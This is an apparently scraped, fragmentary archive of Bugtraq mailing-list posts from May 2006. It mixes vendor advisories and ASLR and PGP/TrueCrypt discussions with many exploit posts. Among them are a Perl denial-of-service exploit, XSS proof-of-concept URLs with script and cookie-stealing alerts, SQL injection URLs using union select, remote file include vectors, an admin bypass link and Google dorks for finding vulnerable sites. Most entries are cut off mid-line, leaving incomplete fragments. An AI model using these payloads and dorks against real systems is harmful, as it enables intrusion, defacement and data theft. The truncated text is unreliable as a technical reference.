Dear c0ntex,
--Friday, May 26, 2006, 11:12:41 AM, you wrote to [EMAIL PROTECTED]:
c> Since ASLR has been in and has been trivially circumvented in Linux
c> for years now (see my papers on return-to-libc & return-to-got) I
c> don't see it being a particularly hard issue to defeat :-) Maybe
c>
Is this the same vulnerability?
http://www.securityfocus.com/bid/5954
On 25 May 2006 13:35:13 -, [EMAIL PROTECTED]
<[EMAIL PROTECTED]> wrote:
#!/usr/bin/perl
#my Web Server << v-1.0 Denial of Service Exploit
#vendor : Eitsop.s5.com
use IO::Socket;
use strict;
my($socket) = "";
if($s
On Wed, 24 May 2006, Mike O'Connor wrote:
> :Sun says it is jabber, which is why I put it quotes. Since they have not
> :replicated in lab, they are jumping to conclusions. Yes, I agree,
> :it is very specific and the backline engineer usage appears 'stretching
> things'
> Most Sun adapters have
Although it is a well-known fact that Windows desktops and servers still
use LM hashes and cache the last ten userids and passwords locally, just
in case an Active Directory, Domain, or NDS tree is not available, has
anyone thought about the consequences of this issue in a hot-desking, or
flexible
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
___
Mandriva Linux Security Advisory MDKSA-2006:092
http://www.mandriva.com/security/
___
We appreciate your comments,
Did you check truecrypt video ?
http://www.safehack.com/Advisory/truecrypt/truecrypt.html
We are not saying maybe it is documented feature. We did not see that and the
objective was not to test truecrypt but it was to test pgp. It was a trial on
truecrypt and we re
On Wed, 24 May 2006 [EMAIL PROTECTED] wrote:
> Steps to access PGP Encrypted Disk (Passphrase) using a Backdoor type attack
> [...]
> * Now say you give that disk to someone and they changed the
> passphrase on it. You can still access it
Intuitively, the system works as follows: a rando
While doing some work using PHP, I found something interesting which
possibly can be used to exploit this kind of bug. Instead of injecting a
carriage return chr(0x13) you can also inject the PHP terminate code ( ?> ) to
stop a one-line comment (// or #) in PHP (tested on 5.1.4 on Windows).
ex:
O
Homepage:
http://www.tuttophp.altervista.org/morrisguest-ing.htm
Description:
Morris Guestbook is a text-based guestbook with the following features: Data
storing on text file, paging of messages on screen, words crypting, counting of
inserted messages, blockage of messages with both html t
Homepage:
http://www.tuttophp.altervista.org/smileguest-ing.htm
Description:
Smile Guestbook is a cool text-based guestbook with smilies inserting and other
features below
Affected files:
view.php
An XSS attack is possible due to no filtering of the pagina variable:
http://www.example.com/p
Homepage:
http://www.tuttophp.altervista.org/main.php
Description:
Text-based guestbook with the following features: - Data storing on text file -
Paging of messages on screen - Blockage of messages with words too long into -
Blockage of messages with both html tags(<>) - Validity-checking of
MyYearBook.com - Personal community site like myspace.com
Affected files:
Input forms of:
editing profile
posting a blog
search boxes
posting a bulletin
posting a comment
---
XSS Vulnerabilities proof of concept:
When editing your profile, it seems
I forgot to say that IE6 SP2 is not affected.
I've successfully tested it in the English version of Windows XP Pro SP2 with IE 6.
It's very strange...
2006/5/25, r0xes <[EMAIL PROTECTED]>:
Nope. Also, doesn't work on WinXP Home Sp2 with IE 6.
=\
Maybe it is only Windows ___yourlanguage__ ?
On 5/24/06, unknown user < [EMAIL PROTECTED]> wrote:
>
Vacation Rental Script v1.0
Homepage:
http://www.vacationrentalscript.com/
Description:
Vacation Rentals is the best solution for your vacation rental online business.
It's easy to install, easy to use, provides lots of features and option
details. Just check the online demo and convince you
Super Link Exchange Script v1.0
Homepage:
http://www.ebizunion.com/guidetosuper.php
Description:
Main Features: 1. Add unlimited nested category/sub-category, 2. Can check
reciprocal link back, 3. Can hide and delete no link back sites. 4. Template
can be edited and suitable to fit your cur
PHPSimple Choose v0.3
Homepage:
http://phpsimplechoose.sourceforge.net
Description:
Do you need to add some fun to your site? Look no further. With
PHPSimpleChoose you can let your users input terms and have one randomly
chosen. Every bit of text is changeable, and we are working on al
iBoutique.MALL
Homepage: http://www.netartmedia.net/mall/
Description:
Based on iBoutique 4.0, iBoutique.MALL is a powerful multi-user mall software
solution. It makes it possible for new vendors to sign up and create their own
customized online stores with ease.
Affected files: index.ph
Some link on the website Vodafone.de contains
a little vulnerability that could be used for
illegal purposes.
It could be used for phishing or other purposes.
hxxp:// website /simlock/servlets/sim?IMEI=[XSS-Code Here]
hxxps:// website /simlock/servlets/sim?IMEI=[XSS-Code Here]
Actually
rPath Security Advisory: 2006-0080-1
Published: 2006-05-24
Products: rPath Linux 1
Rating: Severe
Exposure Level Classification:
Local System User Deterministic Vulnerability
Updated Versions:
postgresql=/[EMAIL PROTECTED]:devel//1/8.1.4-1-0.1
postgresql-server=/[EMAIL PROTECTED]:devel/
There is nothing to fix here, there is no vulnerability. Please visit the
following post from the official Kaspersky Lab forum:
http://forum.kaspersky.com/index.php?showtopic=14734&view=findpost&p=120857
I disabled all of my IE plugins, restarted IE and tested again,
but the exploit worked.
How about refreshing the exploit page and retrying the click on the exploit page?
P.S. Are you using any antivirus program? If you are, how about disabling the
antivirus program and retrying the click on the exploit page?
2006/5/25, s89df987 s9
Here is some information about the issue with PGP and Truecrypt. We cannot
speak for the Truecrypt people, but much of the explanation applies to their
software as well as ours.
We are disappointed that the people who developed this report released it in a
web site and on bugtraq before contac
: Affected Packages:                          Corrected Packages:
OpenPKG CURRENT <= binutils-2.16.1-20060101   >= binutils-2.16.1-20060526
OpenPKG 2.5     <= binutils-2.16.1-2.5.0      >= binutils-2.16.1-2.5.1
OpenPKG 2.4     <= binutils-2.16.1-2.4.0      >= binutils-2.16.1-2.4.1
Descripti
XSS (Cross Site Scripting) on My6D Connection Work System.
We Can Run JScript & HTML Codes & META Tags etc...
Example :
http://www.my6d.com/Plugins/SixDegreeMain/MainLogin.aspx?error=alert('SPYMETA%20WAS%20HERE%20!')
We Can Direct The Page Our Hacked Index
Example :
http://www.my6d.
Did you click on the exploit page?
If you didn't, you must click on the exploit page.
Also, if you run this exploit locally, you must activate active content.
But if you did (and it didn't crash), how about refreshing the exploit
page and retrying the click on the exploit page?
I think it will work.
2006/5/25,
On Mon, 22 May 2006, Mike O'Connor wrote:
> Doug,
>
> :> :ping another device with interpacket delay of 0 and a count
> ...
> :> Define what you mean by "interpacket delay". Are you referring to an
> ...
> :cisco router. extending ping. 0 delay.
> :I was speaking of cisco ping.
> :I should have s
Advisory : Cross Site Scripting in Seditio (http://www.neocrome.net)
Release Date : 24/05/2005
Last Modified : 24/05/2005
Author: Yunus Emre Yilmaz ( http://yns.zaxaz.com)
Application : Seditio v102 ( maybe older versions)
Risk : Critical
Problem :
Ldu's logging
This bug was not discovered by SnoB[http://www.cyber-security.org]!
It was posted long before yours and has the same description and input
examples. Seems like you have stolen it. That's really lame!
Here are the original issues:
(Take a look at the release date)
http://www.securi
This is not a vulnerability because KIS includes a firewall for breaking
self-made downloaders :)
ENGLISH
# Title : Easy-Content Forums 1.0 Multiple SQL/XSS Vulnerabilities
# Dork : "Copyright 2004 easy-content forums"
# Author : ajann
# Exploit;
SQL INJECTION
### http://[target]/[path]/userview.asp?startletter=SQL TE
Assetman <= 2.4a XSS
Discovered by: Nomenumbra
Date: 23/5/2006
Impact: moderate (privilege escalation, possible defacement)
Assetman doesn't filter any of its input, allowing users
to inject arbitrary HTML or JavaScript code.
Nomenumbra
ByteHoard <= 2.1 multiple vulnerabilities
Discovered by: Nomenumbra
Date: 23/5/2006
Impact: high (file manipulation, privilege escalation, possible defacement)
ByteHoard versions up to 2.1 are prone to multiple vulnerabilities, including
directory traversal.
[0x00] Directory traversal:
User
PHP AGTC-Membership system <= v1.1a XSS
Discovered by: Nomenumbra
Date: 23/5/2006
Impact: moderate (privilege escalation, possible defacement)
Ordinary users can add users to the user management system as well,
or change their own email address, which isn't properly sanitized, thus
allowing X
PHPResidence <= 0.6 XSS
Discovered by: Nomenumbra
Date: 23/5/2006
Impact: moderate (privilege escalation, possible defacement)
PHP Residence software doesn't sanitize any of its input,
allowing a malicious attacker (providing he/she has an account)
to inject arbitrary HTML or JavaScript code
Vendor: Plume CMS http://plume-cms.net
Vuln: Remote File Include
Discovered: beford
Vulnerable File/Code
./plume-1.0.3/manager/frontinc/prepend.php
[code]
include_once $_PX_config['manager_path'].'/conf/config.php';
[/code]
http://urlanda.org/manager/frontinc/prepend.php?_PX_config[manager_p
pack.
>
>
> o Credits:
>
> =
>
>
> Thomas Waldegger <[EMAIL PROTECTED]>
>
> BuHa-Security Community - http://buha.info/board/
>
>
> If you have questions, suggestions or criticism about the advisory feel
>
> free to send me a
Isn't the SQL injection vulnerability a bit more critical here?
-Original Message-
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]
Sent: Tuesday, May 23, 2006 7:39 PM
To: bugtraq@securityfocus.com
Subject: Realty Pro One Property Listing Script
Realty Pro One
http://realtypro1.2run2.
Multiple XSS Vulnerabilities in Tikiwiki 1.9.x
Discovered by Blwood
http://www.blwood.net
** Public **
-
Tiki-lastchanges
http://www.site.com/tiki-lastchanges.php?days=3&offset=%22%3E%3Cscr%3Cscript%3Eipt%3Ealert('Blwood')%3C/scr%3C/script%3Eipt%3E
h
#!/usr/bin/perl
#my Web Server << v-1.0 Denial of Service Exploit
#vendor : Eitsop.s5.com
use IO::Socket;
use strict;
my($socket) = "";
if($socket = IO::Socket::INET->new(
PeerAddr => $ARGV[0],
PeerPort => $ARGV[1],
Proto => "TCP"))
ENGLISH
# Title : Tamber Forum <= 1.9.13 Multiple SQL Injection Vulnerabilities
# Author : ajann
# Exploit;
SQL INJECTION
###http://[target]/[path]/show_forum.asp?frm_id=55'SQL TEXT
###http://[target]/[path]/forum_search.asp S
[MajorSecurity]Socketmail <= 2.2.6 - Remote File Include Vulnerability
Software: Socketmail
Version: <=2.2.6
Type: Remote File Include Vulnerability
Date: May, 25th 2006
Vendor: Creative Digital Resources
Page: http://socketmai
Please register and log in to qjForum
# Title : qjForum(member.asp) SQL Injection Vulnerability
# Author : ajann
# Dork : "qjForum"
# Exploit;
SQL
###
http://target/[path]/member.asp?uName='union%20select%200,0,0,username,0,
SOFTWARE
==
phpjobboard
DESCRIPTION:
Job board administration bypass, and edit or add a new job.
example
http://[target]/phpjobboard or your
path/admin.php?menu=job&adminop=job-edit&id=[item id]
greets iskorpitx(best),
ENGLISH
# Title : Toast Forums 1.6.44 in Xss
# Author : ajann
# Exploit;
XSS Example
### Forum Post Message,Reply..
Alert: xxx.com /
# ajann,Turkey
TURKISH
# Title : Toast Forums 1.6.44 in Xss
# Discovered by : ajann
# Vulnerable files;
### To the forum
XSS in Monster Top List | MTL 1.4
-
Software :
Monster Top List
-
version :
Monster Top List 1.4
-
Exploit :
www.site.com/index.phpuser_error_message=[XSS-CODE]
-
Dear [EMAIL PROTECTED],
Sorry, but I see no security vulnerability here.
Disk encryption usually works this way:
1. Disk is divided into blocks (or files). Each block is encrypted with a
random symmetric key to extend security and encryption/decryption
speed.
2. Block key is encrypted
Vulnerable Script: Docebo LMS 2.05
Discovered: beford
Noobs: %22Based+on+DoceboLMS+2.0%22
Vulnerable Files
doceboLMS205/modules/credits/business.php =>
include($_GET['lang'].'/language.php');
doceboLMS205/modules/credits/credits.php =>
include($_GET['lang'].'/language.php');
doceboLMS205/mod
Hi together,
This also works on several web pages of this product.
http://host/OmegaMw7a.ASP?WCI=Logon&WCE=0;alert(unescape(document.cookie));
There might be some ways for SQL injection, too, but I am not willing
to try this on the real system :)
Vendor notified as CC
regards
MC.Iglo
:Sun says it is jabber, which is why I put it quotes. Since they have not
:replicated in lab, they are jumping to conclusions. Yes, I agree,
:it is very specific and the backline engineer usage appears 'stretching things'
Most Sun adapters have an actual jabber counter that netstat -k will
spew ou
:Beyond netstat -k, you can probably use lockstat or other kernel
:profiling tools as I mentioned in my earlier post to give them a
:good idea of where the bug really is. Interrupt issues aren't
:always going to be cut and dried. There could be some particular
:flavor of IOS, network adapter, m
There is no vulnerability.
POP3 antivirus is not developed to counteract trojan-downloaders. These
actions are stopped by firewalls (for example, Kaspersky Internet Security
6.0: Anti-Hacker), proactive defence (Kaspersky Anti-Virus 6.0 and Kaspersky
Internet Security 6.0: Proactive Defe
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
- --
Debian Security Advisory DSA 1075-1[EMAIL PROTECTED]
http://www.debian.org/security/ Martin Schulze
May 26th, 2006
On 26/05/06, David Litchfield <[EMAIL PROTECTED]> wrote:
Address Space Layout Randomization is now part of Vista as of beta 2 [1] . I
wrote about ASLR on the Windows platform back in September last year [2] and
noted that unless you rebase the image exe then little (not none!) is added.
ASLR in V
Address Space Layout Randomization is now part of Vista as of beta 2 [1] . I
wrote about ASLR on the Windows platform back in September last year [2] and
noted that unless you rebase the image exe then little (not none!) is added.
ASLR in Vista solves this so remote exploitation of overflows has
-BEGIN PGP SIGNED MESSAGE-
Hash: RIPEMD160
---
| BuHa Security-Advisory #13|May 25th, 2006 |
---
| Vendor | MS Internet Explorer 6.0 |
| URL | http://www.mic
-BEGIN PGP SIGNED MESSAGE-
Hash: RIPEMD160
---
| BuHa Security-Advisory #12|May 25th, 2006 |
---
| Vendor | MS Internet Explorer 6.0 |
| URL | http://www.mic
Script: V-Webmail 1.6.4
Vendor: http://www.v-webmail.org/
Description: V-webmail is a powerful PHP based webmail application with an
abundance of features, including many innovative ideas for web applications
Discovered: beford
Vulnerable File
v-webmail/includes/pear/*/*.php => require_once ($CO
Webmaster at destiney said:
> I pasted the following example XSS code into both form fields, and saw
> no evidence of XSS vulnerabilities:
>
>
According to the XSS cheat sheet at http://ha.ckers.org/xss.html,
STYLE attributes in DIV tags are only effective in the Internet
Explorer rendering en
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
- --
Debian Security Advisory DSA 1077-1[EMAIL PROTECTED]
http://www.debian.org/security/ Martin Schulze
May 26th, 2006
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
- --
Debian Security Advisory DSA 1076-1[EMAIL PROTECTED]
http://www.debian.org/security/ Martin Schulze
May 26th, 2006
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
- --
Trustix Secure Linux Security Advisory #2006-0030
Package names: kernel, quagga
Summary: Multiple vulnerabilities
Date: 2006-05-26
Affected versio
Hello,
This is an official response from the TrueCrypt development team.
First, this is not a security bug. It is a known, documented and
expected feature. It is utilized, for example, for the volume header
backup/restore operation.
Quotes from the TrueCrypt documentation:
"WARNING: Restoring
Addendum to my previous letter:
Note that this design (master key encrypted with header key) is common
and has been used for many years by many products (for example,
Scramdisk, E4M, etc.)
The main advantage of the design is that the user can change his
password within a few seconds without h